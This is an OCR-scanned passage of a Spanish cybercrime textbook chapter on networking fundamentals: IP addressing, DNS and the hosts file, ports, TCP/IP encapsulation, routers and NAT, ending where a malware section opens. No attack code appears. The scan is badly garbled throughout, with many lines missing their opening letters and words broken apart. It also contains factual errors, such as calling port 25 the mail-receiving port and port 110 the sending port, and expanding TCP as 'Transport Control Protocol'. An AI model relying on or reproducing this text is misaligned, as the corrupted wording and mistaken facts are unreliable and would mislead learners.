nominado direccionamiento IPv4 (todavía más extendido que el IPv6) están
formadas por 32 bits (4 bytes) lo que permite 2 32 = 4.294.96 7.296 direcciones
distintas. Estas direcciones se escriben de manera más compacta mediante
cuatro números decimales, cada uno de los cuales corresponde a un byte y se
separan entre sí mediante un punto decimal:
Ej. 2.8: Ejemplo de dirección IP en binario: 11000000 1010100000000001
00000101. Formato decimal alternativo para la misma lP: 192.168.1.5.

Las direcciones constan de dos partes. La más significativa (los bits


más a la izquierda) se asocian a la red y la parte menos significativa (los bits

- 46 -
Capitulo 2. FUNDAMENTOS DE COMPUTADORES YRE DES

la derecha) se asocia a la estación o host (por ejemplo, un PC, tableta,


1'tphone etc.).
a gestión global de las direcciones IP a nivel mundial depende de IANA
t'net Assigned Numbers Authority). Este organismo gestiona la asignación
bloques de direcciones a los organismos de gestión continentales cono-
como registradores regionales de Internet o RIR (Regional Internet Re-
;ry) . Estos asignan los grupos de direcciones a grandes usuarios finales, no
rticulares, y a los proveedores de acceso a Internet (ISP: Internet Service
vider como por ejemplo MoviStar, Vodafone u Orange). Estos a su vez repar-
las direcciones que han recibido entre sus clientes. Los clientes, corno los
1 u ríos domésticos o pequeñas oficinas, reciben una única dirección y las ern-
sas, organismos e instituciones con gran número de máquinas pueden reci-
tr bloques de decenas, cientos e incluso miles de direcciones. La asignación de
Ir cciones por parte de la IANA permite localizar el origen de una IP mediante
rrarnientas o páginas web corno https://www.iplocation.net/.
Las direcciones IP recibidas de esta manera se denominan direcciones IP
úblicas, puesto que son accesibles por cualquier máquina conectada a Internet.
Si la asignación de la IP es permanente, corno sucede con los números
d teléfono, se dice que es una IP fija o estática. Con este tipo de asignación el
liente tendrá siempre la misma dirección IP, independientemente de que la
use o no. No puede ser utilizada por ningún otro usuario.
Desde finales de los 90, normalmente, los usuarios domésticos no reciben
direcciones IP de manera estática y permanente, sino que el proveedor les asig-
na una dirección IP temporal. Esto le permite al proveedor una mayor flexibi-
lidad al poder dar servicio a más usuarios que direcciones tenga disponibles,
siempre que no se produzca un acceso simultáneo de todos los usuarios. De
esta manera, la dirección IP que tiene asignada el usuario puede cambiar en el
tiempo. Estas direcciones se denominan IP dinámicas. Algunos usuarios, nor-
malmente empresas, que desean instalar algún tipo de servidor solicitan una
IP fija que se otorga con un coste adicional, por tratarse de un recurso escaso.
Además de las direcciones IP públicas asignadas por un organismo regis-
trador existe un importante grupo de direcciones IP que son denominadas IPs
privadas. Estas direcciones solo pueden utilizarse en redes privadas y no tienen
conexión directa a Internet (los enrutadores, en inglés routers) descartan los pa-
quetes de datos con origen o destino esa dirección) lo que permite que máquinas
distintas pertenecientes a redes distintas puedan tener la misma dirección IP. AsL
se amplía enormemente el número de máquinas que pueden utilizar el protocolo
IP. En principio, esta duplicidad de direcciones no presenta ningún problema ya

- 47 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGfA INFORMÁTICA

que son ignoradas por los encaminadores y los paquetes dirigidos a este tipo de
direcciones no salen nunca de la subred local. De esta manera puede haber miles
de subredes privadas que utilicen el mismo rango de direcciones sin que se pro-
duzcan conflictos entre sus máquinas puesto que no se ven entre sí.
Las máquinas con IPs privadas pueden conectarse con las de su red,
pero no tienen acceso a Internet. Para ello necesitan una dirección IP públi-
ca que pueda ser atendida y dirigida por los distintos encaminadores. Esta
es la forma de trabajo habitual en cualquier entorno doméstico y en muchos
entornos empresariales. Todas las máquinas de la red utilizan direcciones IP
privadas y están conectadas a un encaminador (router del Proveedor de Ser-
vicios de Internet, ISP) que les proporciona acceso a Internet. Este dispositivo
tendrá asignada, al menos, una IP pública y como todas las máquinas de la
subred salen a Internet por el mismo encaminador, todas ellas utilizarán la
misma IP pública (la del encaminador correspondiente).
La dirección IP es un elemento que debe tener cualquier máquina conec-
tada a Internet y se especifica cada vez que se establece una conexión con un
sistema remoto. Sin embargo, no se emplean los números de las direcciones
directamente, sino que se utilizan nombres formados por una secuencia de
etiquetas separadas por un punto.
Ej. 2.9 : Por ejemplo, el equipo con lP 216.58.201.131 también responde
por un nombre como www.google.es. Puedes comprobarlo escribiendo en la ba-
rra de navegación de tu navegador la dirección http:/ !216.58.201.131.

Cada etiqueta puede tener hasta 64 caracteres y un nombre puede con-


tener hasta 127 etiquetas, aunque lo más habitual son tres etiquetas y en al-
gunos casos dos o cuatro.
Estos nombres son un código nemotécnico porque lo que se utiliza y
viaja realmente por la red es exclusivamente la dirección IP binaria. La co-
rrespondencia se resuelve mediante el sistema DNS (Domain Name System),
que es una gran base de datos global, distribuida y jerárquica, que almacena
la correspondencia entre los nombres y las direcciones IP correspondientes.
Cada una de las etiquetas separada por un punto define un nivel en la estruc-
tura jerárquica. La última etiqueta es la principal y se denomina dominio de
primer nivel. Las posibles etiquetas en este nivel están definidas por ICANN
(Internet Corporationfor Assigned Na mes and Numbers). En este primer nivel
hay una etiqueta de dos caracteres para cada uno de los países denominados
dominios geográficos y regulados por la norma ISO 3166-1.
Ej. 2.10: Por ejemplo, .es para España, .fr para Francia, .de para Alemania,
.eu para la Unión Europea o .ar para Argentina.

- 48 -
Capitulo 2. FUNDAMENTOS DE COMPUTADORES YRE DES

mbién se encuentra un conjunto de etiquetas de tres caracteres que


án asociados a dominios nacionales y se denominan genéricos. Salvo
· s excepciones en las que están reservados para instituciones y orga-
s de los Estados Unidos, el resto tienen carácter internacional y están
dos al tipo de contenido.
Ej. 2.11: Por ejemplo .edu se aplica a instituciones de educación superior
.com a actividades comerciales, .org a organizaciones no empresariales o .neta
servidores relacionados con temas de red.

Ninguno de estos dominios de primer nivel se puede comprar ni tam-


o se pueden solicitar o registrar nuevos dominios de este primer nivel.
omienzos de 2013 se amplió considerablemente el conjunto de etiquetas
rvadas para el primer nivel y actualmente hay disponibles cientos de eti-
tas de este tipo. El objetivo es disponer de etiquetas de primer nivel que
ugieran la temática de las máquinas que utilicen cada etiqueta concreta, de
1 misma manera que las etiquetas geográficas identifican la nacionalidad
saciada al servidor. Hay que señalar que el hecho de emplear un determi-
n do identificador geográfico no implica necesariamente que las máquinas
sociadas estén ubicadas físicamente en el país referido por la etiqueta. Son
spectos absolutamente independientes.
El dominio de segundo nivel se indica en la segunda etiqueta (comenzan-
do por la derecha). Se puede solicitar el registro de cualquier nombre que no
haya sido previamente registrado y decidir bajo qué dominio de primer nivel
deseamos ponerlo, como: .uned.es, .rtve.es o .wikipedia.org. La adscripción a
algunos dominios de primer nivel es totalmente libre mientras que otros im-
ponen algunas restricciones. Por ejemplo, la adscripción a .edu requiere que
se trate de una institución educativa de nivel superior y .es requiere que el so-
licitante tenga algún derecho reconocido sobre la etiqueta que desea emplear
como dominio de segundo nivel.
Ej. 2.12: Por ejemplo, debe ser su nombre personal o una marca registrada
de la cual tiene los derechos.

En España el dominio .es depende de red.es que es una entidad pública de-
pendiente del Ministerio de Industria, Energía y Turismo. Para realizar el registro
de un dominio de segundo nivel debe solicitarse a alguna de las agencias registra-
doras que normalmente están asociadas con empresas dedicadas a proporcionar
servicios de alojamiento web. El registro conlleva un coste anual para mantener
la titularidad del nombre. Los dominios de los siguientes niveles dependen del
titular que tenga registrado el nombre de domino de segundo nivel.

- 49 -
1 ad.
AD EN TE CNOLOGÍA INFORMÁTICA

, 11 1 na comunicación remota, como cuando se solicita


(I • jemplo www.google.es), se escribe el nombre del serví-
navegador y este, antes de lanzar la petición al servidor web,
nocer su IP. Como los paquetes IP solo contemplan las direcciones IP
in rias, pero no los nombres de dominio, en primer lugar, se consulta la base
de datos del sistema DNS lanzando la petición al servidor de nombres de do-
minio que tenga configurado el PC o sistema local. Si este servidor DNS tiene
la respuesta, contestará con la IP del servidor web solicitado ( en el caso de
Google contestará 216.58.211.35). Como se trata de una base de datos distri-
buida, puede que el servidor consultado no sepa la respuesta y en este caso se
desencadenará una consulta progresiva a distintos servidores hasta obtener
la respuesta. Como se trata de una base de datos jerárquica, esta búsqueda
iterativa está muy dirigida y en el peor de los casos se puede obtener la res-
puesta en muy pocos pasos. Este proceso de obtener la dirección IP a partir
de un nombre de dominio se denomina resolución de nombres de dominio.
Al margen de la base de datos de DNS se puede almacenar una tabla pro-
pia n el ordenador local. Esta tabla se almacena en el archivo hosts que es un
r hlvo d texto por lo que resulta de muy fácil modificación (en Windows
ncu ntra en C:\ Windows\System32\drivers\etc). En cada línea de este
fichero se pone un nombre de dominio y la dirección IP correspondiente. Este
archivo se consulta antes de lanzar una petición a los servidores DNS por lo
que todo lo que se encuentre en él tendrá prioridad sobre lo que esté alma-
cenado en los servidores DNS. Esto puede servir para forzar una redirección
que se puede utilizar para pruebas o para utilizar un nombre de dominio con
otra máquina distinta a la que está registrada en el sistema DNS. Por ejemplo,
se puede utilizar un nombre público y redirigirlo a una máquina de la subred
local. En ocasiones esta redirección se suele hacer con fines maliciosos hacia
sitios web dedicados a actividades delictivas.
Ej. 2.13: si en el fichero host incluimos la línea 127.0.0.l www.google.es
estaremos redirigiendo la página de Google a nuestro propio ordenador blo-
queándola.

El esquema de direccionamiento lógico IPv4 quedó saturado debido a que,


aunque el número de direcciones parecía más que suficiente, el rápido incremento
en el número de estaciones conectadas a Internet y la rigidez de la asignación de di-
recciones mediante bloques han provocado el agotamiento del espacio de direccio-
nes 1. Esta situación se previó hace más de veinte años y se diseñó para solventarlo

1 Desde el 3 de febrero de 2011 IANA no dispone de ningún bloque de direcciones


para asignar y los bloques disponibles por los distintos RIR están también agotados.

- 50 -
Capítulo 2. FUNDAMENTOS DE COMPUTAD l S YREDES

1 protocolo IPv6. Su principal característica es que utiliza direcciones de 128 bits


ue proporciona un espacio de direccionamiento de 2128 = 3,4· l038 direcciones.
Además del aumento en el número de direcciones, IPv6 introduce otra
rie de ventajas entre las que destacan: seguridad integrada (IPsec), mayor
implicidad en la configuración de estaciones, calidad de servicio, movilidad
roaming y multienvío (multicast) efectivo. Aunque el esquema de direccio-
miento de IPv6 tiene más de veinte años, actualmente, solo algunos pro-
edores han migrado a IPv6. Es posible que el agotamiento de direcciones
Pv4 acelere la migración al nuevo espacio de direccionamiento.
IPv6 es fundamental para que se pueda implantar definitivamente la In-
t rnet de las cosas, es decir la incorporación a Internet de multitud de dis-
positivos de uso cotidiano: vehículos o partes del mismo, prendas de vestir,
ualquier elemento doméstico, electrodomésticos de todo tipo, puertas, inte-
rruptores de luz, lámparas, persianas, radiadores.
La capa de transporte de TCP /IP define dos protocolos fundamentales :
TCP (Transport Control Protocol) y UDP (User Datagrama Protocol). La capa
de transporte establece la comunicación entre los procesos paritarios de am-
bos extremos. De esta manera conectará el navegador web del usuario con el
servidor web, el programa de correo con el servidor de correo y el reproduc-
tor de medios o contenido audiovisual con el servidor de streaming.
Cuando una petición llega a una máquina, no basta con especificar la di-
rección de la máquina destinataria, sino que habrá que especificar el proceso
(aplicación o servicio) que debe atender esa petición. En otro caso el sistema
destinatario no sabría cómo atender la solicitud. Este es el direccionamiento
a punto de servicio. En el modelo TCP /IP se realiza con un valor de 16 bits
que se representa como un número entero en base decimal. Este esquema
de direccionamiento permite 2 16 =65536 posibles puntos de servicio (de O a
65535) que son los denominados puertos.
El rango de posibles puertos se divide en tres grupos. El primero son los
puertos bien conocidos o puertos de sistema (O - 1023), están definidos por
IANA (Internet Assigned Numbers Authority) y tienen asociado algún servi-
cio concreto.
Ej. 2.14: El correo electrónico usa el puerto 25 para la recepción de correo
(protocolo SMTP) y el llO para el envió de correo (protocolo POP3). Cuando
navegamos por internet usamos el puerto 80 (protocolo HTTP) y el puerto 443
(protocolo seguro HTTPS) para la transferencia de páginas web.

El segundo grupo son los puertos registrados o puertos de usuario


(1024 - 49151), que están registrados por IANA para evitar duplicidades y

- 51 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

los del tercer grupo son los puertos dinámicos, efímeros o privados (49152 -
65535) que permanecen libres para cualquier uso.
Cuando se desea conectar con una máquina remota se necesita su direc-
ción IP y el servicio o número de puerto al que debe dirigirse la petición. Esta
pareja de elementos define lo que se conoce como socket o conexión. En los
servicios registrado por !ANA, no es necesario el número de puerto ya que las
aplicaciones lo incluyen por defecto.
Ej. 2.15: Cuando se solicita una página web por http únicamente se utiliza
la direcciónIP del servidor, el número de puerto (80 en este caso ) lo añade au-
tomáticamente el navegador (no es necesario añadirlo al final de la url http://
www.elpais.es:BO). También es posible instalar o configurar un servidor w eb
que atienda las peticiones en otro número de puerto, pero en ese caso debere-
mos introducir explícita mente ese número de puerto alternativo.

Los números de puerto se utilizan tanto para las peticiones de un clien-


te a un servidor como para las respuestas del servidor al cliente. Cuando un
cliente realiza una petición a un servidor utiliza la dirección del servidor y el
número de puerto correspondiente al servicio solicitado. A esta petición le
afiade la información necesaria para recibir la respuesta que será la direc-
ción IP del cliente (es decir su propia dirección IP) y un número de puerto
que atenderá esa respuesta. Este número de puerto de respuesta lo elige la
aplicación del cliente de manera arbitraria entre todos los puertos disponi-
bles dentro del rango de los puertos dinámicos o efímeros. De esta manera,
el servidor podrá realizar una respuesta mediante un socket (IP+Nº puerto)
al cliente y que llegue correctamente a su destino: el programa, aplicación o
proceso que solicitó el servicio.
Cuando un programador desarrolla una aplicación, crea un programa de
capa de aplicación y hace uso de los servicios que le proporciona la capa de
transporte. Estos servicios se proporcionan como funciones que el progra-
mador deberá ejecutar para realizar la comunicación.
La capa de aplicación constituye el nivel superior de la comunicación y
es en la que se ejecutan las aplicaciones con las que interactúa directamente
el usuario.
Ej. 2.16: El protocolo de envío de correo se conoce como SMTP, de
recepción de correo corno POP3, de sincronización de buzones de correo
la realiza el correo IMAP. el principal protocolo de transferencia de fiche -
ros es FTP o de transferencia de páginas web se realiza con los protoco-
los HTTP y HTTPS (versión segura de HTTP).

- 52 -
Capítulo 2. FUNDAMENTOS DE COMPUTADOR.ES Y RE DES

ontrario de lo que sucede en las capas anteriores, la capa de apli-


no dispone de un esquema de direccionamiento universal, sino que
olo de cada aplicación define su propio esquema. El ejemplo más
t es el correo electrónico. Las direcciones de correo electrónico están
das por el campo de usuario y el servidor de correo que proporciona el
,,, to al usuario separados por el símbolo@.
Ej. 2.17: La [email protected] nos indica que el usuario jlopez tiene
una cuenta en (@ en inglés se lee at) el servidor Gmail.com.

Generalmente los programas de la capa de aplicación siguen el para-


a de comunicación cliente-servidor. En la comunicación cliente-servi-
r, el servidor está permanentemente en funcionamiento, a la espera, por-
puede recibir peticiones de un cliente en cualquier momento, mientras
los ordenadores cliente suelen estar activos de manera intermitente.
s servidores atienden peticiones de forma concurrente ya que distintos
11 ntes pueden solicitar sus servicios simultáneamente. Tienen asignada
na o varias IPs públicas de manera estática y su nombre es públicamente
nacido y estable. Los clientes son absolutamente independientes y no tie-
n n ninguna relación entre sí. Los servidores web son el ejemplo más claro
d este tipo de comunicación. En la estrategia cliente-servidor las aplica-
iones que ejecutan la máquina del usuario y el servidor son radicalmente
dis tintas.
Ej. 2.18: Comunicación cliente-servidor por medio de protocolo HTTP a un
servidor web. El cliente puede utilizar cualquier navegador (Google Chrnme, Fi-
refox, Internet Explorer, Opera, MS-Edge ... ) mientras que el servidor ejecutará
algún software servidor web (Apache, NginX, IlS ...). Estos dos grupos de aplica-
ciones son funcionalmente muy distintos.

En las redes entre pares (Peer to Peer, P2P) no hay servidores dedicados
salvo para tareas complementarias de funcionamiento y control de la propia
red (por ejemplo, en emule el login al servidor y anunciamiento de los archi-
vos disponibles en los clientes para compartir), mientras que las transferen-
cias de información se realizan exclusivamente entre los clientes. En este caso
todas las máquinas ejecutan la misma aplicación o aplicaciones que, aunque
pueden ser distintas son funcionalmente equivalentes.
Los sistemas P2P constituyen redes colaborativas en las que se parti-
cipa mediante la instalación de una aplicación compatible. Así, los costes y
la gestión están distribuidos pero las prestaciones dependen de la potencia
de las conexiones de los distintos usuarios. La seguridad resulta mucho más

- 53 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

compleja al tratarse de un sistema extenso y distribuido donde se desconoce


quién está detrás de cada máquina. Redes P2P muy conocidas son las redes
para compartir archivos como Emule o Torrent, la aplicación de mensajería y
videoconferencia Skype o la distribución de televisión entre pares (P2PTV).
Con todo ello se puede entender el ciclo de vida de los paquetes TCP /
IP. El protocolo TCP /IP está diseñado para resolver las comunicaciones en
Internet. Para ello va definiendo una serie de conceptos y formas de actuar
en las que incluye la información necesaria. Desde el punto de vista del in-
vestigador, esta información es muy relevante para conocer qué ha sucedi-
do y quién ha realizado las acciones desarrolladas en la comunicación. Por
ello, es de especial interés el ciclo de vida de los paquetes. El ciclo de vida
empieza cuando se ejecuta un comando o se envía un mensaje y finaliza
cuando la aplicación adecuada del sistema receptor recibe el paquete. La
siguiente figura lo ilustra:

Envío Recepción
Capa de aplicación Paquete rlogin Capa de aplicación Recibe solicitud de
inicio de sesión

Capa de transporte Segmento TCP Capa de transporte


Segmento TCP

Capa de red Datagrama 1P Capa de red


Datagrama IP

Capa de enlace Estructura Capa de enlace


Estructura

Capafisica Estructura Capafisica


Estructura

Medio

Cuando un usuario ejecuta un comando de capa de aplicación TCP /IP el


mensaje o comando del usuario se transfiere a través de la pila de protocolo TCP /
IP del sistema local de forma descendente. Los protocolos de cada capa del nodo
(host) de envío agregan información a los datos originales. A continuación, el

- 54 -
Capítulo 2. FUNDAMENTOS DE COMPUTADORES YRE DES

oj pasa por el medio de red hasta los protocolos del sistema remoto. Cada
olo interactúa con sus equivalentes en el nodo de recepción (por ejemplo,
TCP del emisor envía, la capa TCP del receptor responde).
· l paquete básico está formado por un encabezado con las direcciones de
1 temas de envío y recepción, y un cuerpo, o carga útil, con los datos que se
- transferir. Cuando el paquete se transfiere a través de la pila de protocolo
/IP, los protocolos de cada capa agregan o eliminan campos del encabezado
i o. Cuando un protocolo del sistema de envío agrega datos al encabezado del
uete, el proceso se denomina encapsulado de datos. Cada capa tiene un tér-
tno diferente para el paquete modificado.
El protocolo de aplicación da formato al paquete para que el protocolo
apa de transporte adecuado (TCP o UDP) pueda manejar el paquete.
Supongamos que el usuario ejecuta un comando rlogin para iniciar se-
tón en el sistema remoto. El comando rlogin utiliza el protocolo de capa de
rnnsporte TCP. Así, la capa de aplicación prepara el paquete para enviar la
t formación del comando a la capa de transporte como protocolo TCP. Otro
ornando podría utilizar otro protocolo, como UDP, y la capa de aplicación lo
prepararía para la de transporte.
En la capa de transporte se inicia el encapsulamiento. Desde el punto de vis-
ta de la información, en ella se agregan datos como el número de puerto (direc-
ción de memoria) por la que se envían y reciben los datos de esta comunicación.
Además, la capa de protocolo de transporte puede proporcionar otros
servicios, como la entrega de datos ordenada y fiable. Para ello, TCP divide los
datos que se reciben de la capa de aplicación en segmentos y adjunta un enca-
bezado a cada segmento. Los encabezados de segmento contienen los puer-
tos de envío y recepción, información de orden de los segmentos y campos
técnicos para las comunicaciones.
Finalmente se establece una conexión TCP entre las capas del emisor y
el receptor.
Los protocolos de transporte TCP y UDP transfieren sus segmentos y pa-
quetes a la capa de red, en la que el protocolo IP los prepara para la entrega
asignándolos a unidades denominadas datagramas IP.
IP agrega un encabezado IP al segmento o encabezado del paquete. La
información del encabezado IP incluye las direcciones IP de los hosts de en-
vío y recepción, la longitud del datagrama y el orden de secuencia del data-
grama. Esta información se facilita si el datagrama supera el tamaño de bytes
permitido para los paquetes de red y debe fragmentarse.

- 55 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURIDAD EN TECNOLOGíA INFORMÁTICA

Los protocolos de capa de enlace de datos, como PPP colocan el datagra-


ma IP en una estructura. Estos protocolos adjuntan un tercer encabezado y
un pie de página para crear una estructura del datagrama. A continuación, la
capa del vínculo de datos transfiere la estructura a la capa física.
La capa de red física del host de envío recibe las estructuras y convierte las
direcciones IP en las direcciones de hardware adecuadas para el medio de red. A
continuación, la capa de red física envía la estructura a través del medio de red.
Como puede observarse en cada capa se va agregando toda la informa-
ción necesaria para identificar al emisor y al receptor.
Cuando el paquete llega al host de recepción, se transfiere a través de la
pila de protocolo TCP /IP en el orden inverso al de envío. Cada protocolo del
host de recepción filtra la información de encabezado que adjunta al paquete
su capa equivalente en el host de envío. El proceso:
l. La capa de red física recibe el paquete con el formato de estructura,
procesa los parámetros técnicos de la comunicación para ver si es
correcta y envía la misma estructura a la capa de enlace.
2. La capa del enlace comprueba que los parámetros de la comunica-
ción son correctos y los filtra de la estructura, enviando la estructu-
ra filtrada a la capa de red.
3. La capa de red lee la información del encabezado para identificar
la transmisión. Si la transmisión está fragmentada, el protocolo IP
reúne los fragmentos en el datagrama original. A continuación, IP
filtra el encabezado de IP y transfiere el datagrama a los protocolos
de capa de transporte.
4. La capa de transporte (TCP, SCTP y UDP) lee el encabezado para de-
terminar qué protocolo de capa de aplicación debe recibir los datos. A
continuación, TCP, SCTP o UDP filtra el encabezado relacionado. TCP,
SCTP o UDP envía el mensaje o el flujo a la aplicación de recepción.
5. La capa de aplicación recibe el mensaje y realiza la operación que
solicita el h ost de envío.

2.3. Los dispositivos de conexión: hub, switch y pasarelas (gateways)


En el contexto de la seguridad informática se suele prestar mucha aten-
ción a los nodos y a los servidores que intervienen en la comunicación. Sin
embargo, son igualmen te importantes los dispositivos de conexión. Una vez
entendido el modelo OSI y 1 protocolo TCP /IP se puede comprender su rol e
¡mportancia en cada niv l.

- 56 -
Capítulo 2. FUNDAMENTOS DE CO:ll.1PUTADORES YREDES

En el nivel más bajo, capa física, se establece la conexión de máquinas


1 diante un medio físico, (cable eléctrico, fibra ...), formando una red. Para
tener las señales se utilizan repetidores y cuando estos repetidores dis-
n de múltiples puertos se denominan concentradores o hubs. En este ni-
1no se interpretan las tramas y por lo tanto no se identifican las direcciones
rigen y destino implicadas. Por ello, una trama viaja por toda la red, visi-
do todos los nodos, cuando realmente sólo sería necesario que viajase por
segmentos de red interesados en la comunicación, los que unen origen
d stino. Por ello se producen numerosas colisiones, entendiendo por ello
vías fallidos.
Esta situación es muy poco eficiente y además presenta problemas de
guridad. Por tanto, se necesita un dispositivo de interconexión que trabaje
n capa de enlace. Este tipo de dispositivo se denomina conmutador o switch.
Los conmutadores permiten la interconexión de múltiples máquinas
ntro de una misma red. Pero no entre redes distintas. Para ello se tienen
que identificar las direcciones lógicas (capa de red) y por lo tanto es necesa-
rio un dispositivo que trabaje en capa de red. A estos dispositivos se les deno-
mina encarninador o router.
Este tipo de dispositivo es mucho más complejo y debe decidir la estra-
tegia de encaminamiento. Para ello, mantienen unas tablas de encaminamien-
to que se deben actualizar periódicamente y deben ejecutar un algoritmo de
encaminamiento. Los encarninadores sencillos, corno los utilizados en el ám-
bito doméstico sólo tienen dos puertos: uno para conectar con la red local
(LAN) y otro que conecta con el proveedor del servicio (WAN), por lo que su
esquema de encaminamiento es muy simple y eso permite que resulten muy
económicos.
La conexión a niveles superiores se realiza casi exclusivamente en la
capa de aplicación. La conexión en capa de aplicación no se realiza median-
te dispositivos físicos específicos sino que se realiza mediante un ordenador
configurado para esa tarea. Un ejemplo de conexión a este nivel son los ser-
vidores de correo electrónico. Cuando se envía un mensaje, se dirige al servi-
dor que proporciona el servicio y este lo irá pasando a otros servidores hasta
alcanzar el servidor que da servicio al destinatario. La comunicación entre
todos estos servidores se realiza almacenando y reenviando el mensaje com-
pleto y para ello se requiere que trabajen en el nivel de aplicación.
Con el fin de entender cómo se realizan las comunicaciones en Internet
es importante comprender el siguiente ejemplo.

- 57 -
Cibercriminalidad.
Primera parte. FUNDAMENTOS DE SEGURlDAD EN TECNOLOGÍA INFORMÁTICA

Ejemplo: Se dispon de una red local con dos máquinas: un ordena-


dor de sobrem l IP 172.18.3.5 (privada) y un ordenador portátil con
I 72, ( ). s necesario además disponer de una IP local (LAN)
j mplo 172.18.3.1, así como una IP para conectarse a In-
) que será 120.15.12.4. Inicialmente, el ordenador portátil
nví una petición a una máquina externa 80.100.1.5.Al pasar por
t anota esta pareja de direcciones en la tabla, sustituye la IP privada
u IP pública y envía la petición a Internet. Este mismo ordenador lanza
otra petición al servidor externo 62.204.2.3 y el router hará lo mismo: anota la
pareja de direcciones en la tabla, realiza la sustitución de la IP privada por la
pública y envía la petición a Internet. Paralelamente el ordenador de sobreme-
sa realiza también una petición al servidor externo 62.204.2.3. El router realiza
las mismas acciones, anota la pareja de direcciones en la tabla, sustituye la IP
privada del remitente por su IP pública y realiza el envio a Internet.
Para analizar las respuestas supóngase que la primera respuesta viene
del servidor externo con IP 80.100.1.5. El router buscará en su tabla y verá
que la petición la realizó la máquina interna 172.18.3.2, sustituirá la IP de
destino, que era su IP pública, por la IP obtenida de la tabla y enviará el pa-
quete a la red interna. Esta comunicación se realiza con éxito.
A continuación, llega una respuesta de la máquina externa 62.204.2.3, el
router buscará en la tabla, pero ahora se encontrará con el problema de que
esta dirección aparece dos veces, pero con dos direcciones IP internas distin-
tas y por lo tanto no sabrá a cuál de las dos corresponde la respuesta recibida.
Por otra parte, una máquina externa a la red formada por estos dos or-
denadores (161.16.15.8), realiza una petición a la red local empleando la IP
pública del router. Cuando la petición llegue a este dispositivo buscará la IP
del remitente en la tabla, pero no la encontrará por lo que tampoco sabrá qué
hacer con esa petición.
El problema con las respuestas descrito en el anterior ejemplo puede re-
solverse con lo que se conoce corno NAT (Network Address Translation, tra-
ducción de direcciones de red o enmascaramiento de IP) y en su forma más
sencilla hace uso de los números de puerto o direcciones a punto de servicio
de la capa de transporte.
En los protocolos TCP y UDP se disponen de 65.536 puertos para es-
tablecer conexiones. Cómo se indicó anteriormente muchos de ellos están
reservados por la IANA pero un gran número son dinámicos o efímeros. De
modo que cuando una máquina quiere establecer una conexión, el router
guarda su IP privada y el puerto de origen (IP_privada/80 por ejemplo) y los

- 58 -
Capítulo 2. FUNDAMENTOS DE COMPUTADORES YREDES

la IP pública y un puerto al azar de entre los dinámicos o efímeros


blica/53430 por ejemplo). A este puerto elegido al azar se le denomi-
rto asignado y solo se asigna a una petición. Cuando llega información
rto asignado el router comprueba la tabla y lo reenvía a la IP privada
to que correspondan. Esta tabla resulta evidentemente crítica para la
•idad del sistema de información.
uando la máquina externa conteste lo hará empleando como IP desti-
1'1B la IP pública del router como hasta ahora pero en el campo dedicado
u rto de destino pondrá el puerto asignado por el router y este es único
1 tabla NAT por lo que puede discriminar a quién le corresponde la res-
ta. Al recibir el router la respuesta, esta tendrá la información de la IP
llca del destino y el puerto asignado por el router destino a esta comuni-
t lón, datos que también apuntará en la tabla NAT.
Falta resolver el problema de las peticiones que se originan en el exterior
que lógicamente no tendrán una entrada en la tabla del router. Esto requie-
una configuración manual del router en la que se establecerá qué máquina
Inte rna atenderá las peticiones a cada uno de los servicios que se soliciten
1 exterior (correo, servicios, ... ). Esta operación de configuración recibe el
mbre de configurar puertos, desviar puertos o más coloquialmente abrir
puertos. Puede encontrarse en los routers bajo algún menú como NAT, Virtual
s rvers, Forwarding (reenvió de puertos) o similares.
Por motivos de seguridad es conveniente eliminar de esta tabla todas las en-
tradas que no se estén utilizando. Reflexionando sobre el protocolo TCP /IP con
NAT puede observarse que tiene ventajas desde el punto de vista de la seguridad
ya que las máquinas conectadas a la red mediante NAT no son visibles desde el
exterior, por lo que un atacante externo no podría averiguar si una máquina está
conectada o no a la red. También tiene ventajas para el mantenimiento de la red
ya que solo es necesario modificar la tabla de reenvío de un router para desviar
todo el tráfico hacia otra máquina mientras se llevan a cabo tareas de manteni-
miento. Pero esta ventaja en el mantenimiento también implica un riesgo en la
seguridad ya que si un atacante consigue acceder a la tabla tiene toda la informa-
ción para realizar un ataque eficaz y todo lo necesario para controlar la red. Por
todo ello es imprescindible comprender bien cómo opera el router y protegerlo
adecuadamente. En conclusión el router es un elemento crítico para la seguridad.

III. CÓDIGOS MALICIOSOS

Los vectores de ataque a los sistemas informáticos y de telecomunica-


ciones pueden ser múltiples y diversos, tanto de origen físico como de origen

- 59 -
lbe rcriminalidad.
NTOS DE SEGURIDAD EN TECNOLOGÍA INFORMÁTICA

. ntre los métodos lógicos están aquellos programas que tienen por
objeto acceder, modificar o eliminar la información de forma no autorizada.
Esto puede provocar un gran daño.
Estos ataques pueden tener diferentes motivaciones, tales corno el es-
pionaje industrial, la extorsión, la negación de prestación de servicios, altera-
ción de información, alteración en el funcionamiento de los sistemas, etc. La
finalidad puede ser 1b n ficio económico, influir política o ideológicamen-
t n un m r o o ial d terminado, el perjuicio y/ o el colapso de servicios y
nrli!HHICiO d t re ros, etc.
Malware s un término creado por el profesor y teórico israelí Yisrael Radai
n 1990 que proviene del acrónimo de dos palabras inglesas, malicious software.
Un software catalogado como malware se caracteriza por su intencio-
nalidad, no se debe a errores de diseño. Se ha creado exprofeso para reali-
zar una actividad perniciosa para la información o el sistema que la alberga.
Bajo este término se engloba todo el software que de forma malintencionada
pretende acceder, modificar o eliminar la información, acceder a información
confidencial, acceder a los sistemas informáticos, lograr el control remoto de
los mismos e incluso su inutilización. El malware puede hacer referencia a
una gran variedad de software dañino, destacando los troyanos, gusanos, ran-
somware, software espía, adware, scareware, entre otros.
Tiene su origen en los primeros programas creados como pequeños ex-
perimentos, incluso bromas. En estos lo que se pretendía no era otra cosa que
avanzar en el conocimiento y comprobar con qué velocidad eran capaces de re-
plicarse y distribuirse para alcanzar la mayor difusión posible. No se pretendía
ni se te_nía conciencia de los perjuicios que producía su funcionamiento.
La explosión del uso de Internet provocó que el malware se desarrolla-
se vertiginosamente para poder obtener, ya sea legal o ilegalmente, beneficio
del gran número de usuarios que acceden a Internet.
Desde los primeros años de la década del 2000 su desarrollo ha ido
orientado sobre todo hacia la toma de control de los sistemas, haciendo que
pasen a comportarse como ordenadores "zombies" o "bots" que pertenece a
una o varias botnets (grupos de PC infectados y controlados por un atacante
de forma remota) que podrán ser alquiladas o vendidas en el mercado negro
